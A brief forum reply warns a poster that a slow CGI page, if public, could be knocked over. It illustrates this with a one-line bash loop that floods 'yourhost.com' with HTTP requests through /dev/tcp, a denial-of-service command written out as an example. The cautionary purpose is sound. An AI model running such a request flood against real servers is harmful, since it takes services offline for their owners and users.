in reply to avoid time out

Hopefully this page isn't publicly accessible? Else I can DOS your server from bash command line:
while true; do echo -e "GET /yourcgi.cgi HTTP/1.0\n" > /dev/tcp/yourhost.com/80 done

+++++++++ In theory, theory describes reality, but in reality it doesn't.